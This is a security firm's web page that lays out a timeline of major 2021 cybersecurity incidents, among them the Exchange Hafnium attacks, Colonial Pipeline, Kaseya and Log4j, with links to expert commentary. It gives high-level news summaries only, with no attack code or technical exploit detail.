2021 Cybersecurity Events Timeline
How experts responded to critical cybersecurity events
Share
Hafnium/Microsoft Exchange
Jan 6 - Mar 2
On March 2, Microsoft announced that a well-organized China-based threat actor named “Hafnium” deployed targeted attacks against several US businesses currently hosting “on-premise” Exchange servers using multiple previously-unknown zero-day vulnerabilities.Typical zero-day attacks exploit a single vulnerability; however, widespread attacks by Hafnium (rumored to be state-run) have taken advantage of four previously unknown vulnerabilities in the Microsoft Exchange environment. It’s estimated that at least 250,000 servers were affected globally, including servers operated by 30,000 US organizations.
Experts Respond
Microsoft Exchange “Hafnium” Hack: Recommended Steps
Read Blog Post
Watch On Demand
Optiv Flash Panel: Analysis of FBI
Response to MS Exchange Hack
Experts Respond
Read Blog Post
Attempted Florida Water Supply Tampering Underscores IoT/OT Security Challenges
Experts Respond
On February 5, an attacker attempted to infiltrate the water system of Oldsmar, FL, a community outside of Tampa. The attack was thwarted when an observant employee, whose role is to monitor water quality levels, noticed the hacker attempting to alter the amount of sodium hydroxide (aka lye) to levels that could have poisoned up to 15,000 residents. The attacker gained entry through a remote access system that employees regularly use.
Feb 5
Oldsmar
On May 7, Colonial Pipeline, the largest pipeline system for refined oil products in the US, suffered a ransomware attack at the hands of DarkSide, a ransomware as-a-service (RaaS) gang. The hack effectively shut down the pipeline, leading to massive financial losses. On May 13, Colonial paid $4.4 million to DarkSide to get the decryption key and restore operations.
May 7
Colonial Pipeline
Responding to a rash of damaging and highly publicized attacks, including SolarWinds and Colonial Pipeline, the White House issued an Executive Order on Improving the Nation’s Cybersecurity (EO #14028) – a mandate that will apply to all businesses and contractors working with the Federal Government.
May 12
White House Executive Order
In what a prominent news service called “one of the single largest criminal ransomware sprees in history,” threat actors employing REvil ransomware successfully hacked Kaseya’s Virtual Systems Administrator (VSA) software. ~50 Kaseya customers are managed service providers, and the attackers were able to spread the ransomware, via these MSPs, to as many as 1,500 other organizations.
Jul 2
Kaseya
Watch On Demand
Optiv Flash Panel: White House Cybersecurity Executive Order
Experts Respond
Read Blog Post
Combating Ransomware – Protecting a Nation’s Critical Infrastructure
Experts Respond
Watch On Demand
Optiv Flash Panel: Supply-Chain Attack or Zero-Day Vulnerability?
Experts Respond
Read Blog Post
Kaseya Compromise – Immediate Actions Recommended:
Experts Respond
On December 9, Chen Zhaojun of the Alibaba Cloud Security Team discovered a high severity zero-day exploit in the popular Java logging library Log4j (version 2) that allows unauthenticated remote code execution. The exploit potentially threatened many services, including Steam, Apple iCloud and Minecraft.
Dec 9
Log4j
Watch On Demand
Optiv Flash Panel: Zero-Day Apache
Log4j2 Vulnerability
Experts Respond
Visit the Hub
Apache Log4j2 Resource Hub
Experts Respond
The Optiv Threat Group
Optiv’s Threat group actively tracks all known cybersecurity incidents and distributes daily client alerts detailing active threats.
These alerts include available prevention, patch and remediation advice. If they choose, clients may then follow up with their Optiv Threat team.
CD PROJEKT RED
Feb 8
Gaming studio CD PROJEKT RED, Makers of The Witcher 3: Wild Hunt and Cyberpunk 2077, had source code stolen by hackers, who reportedly sold it to an anonymous buyer.
Acer
Mar 19, Oct 14
Computer manufacturer Acer was targeted by multiple cyber attacks. In March ransomware gang REvil demanded $50M for the safe return of stolen data; two October attacks by the Desorden Group claimed to have stolen data, although it said it wasn’t demanding ransom – it was attempting to prove that Acer’s security was still insufficient.
CNA
Mar 21
CNA Financial Corp. was targeted by a ransomware attack that may have compromised the personally identifiable information (PII) of 75,000 people. CNA reported paid a $40 million ransom for the data.
Brenntag
Apr 28
Using stolen credentials, hackers affiliated with the DarkSide gang breached Germany-based Brenntag, one of the largest chemical distributors in the world. The company eventually paid a $4.4 million ransom in Bitcoin to prevent a public leak of the stolen data.
JBS
May 30
Brazil-based JBS SA, which supplies roughly a fifth of all meat globally, was targeted by a ransomware attack. As a result, all JBS USA operations were temporarily shut down. The company paid $11 million for the decryption key.
AXA
May
An Asian division of French insurer AXA was attacked by threat actors associated with the Avaddon ransomware as-a-service group, who claimed to have stolen three terabytes of PII. The hack came just days after the company said it would stop paying ransomware claims.
Log4j
Kaseya
White House Executive Order
Colonial Pipeline
Halfnium/Microsoft Exchange
Oldsmar
2021 Tracked Threats
“My administration is continuing to safeguard our critical infrastructure, the majority of which is privately owned and managed, like Colonial Pipeline. Private entities are in charge of their own cybersecurity, and we need — and we have to — we know — we know what they need. They need greater private-sector investment in cybersecurity.”
- President Biden on the Colonial Pipeline Incident
Jump back to top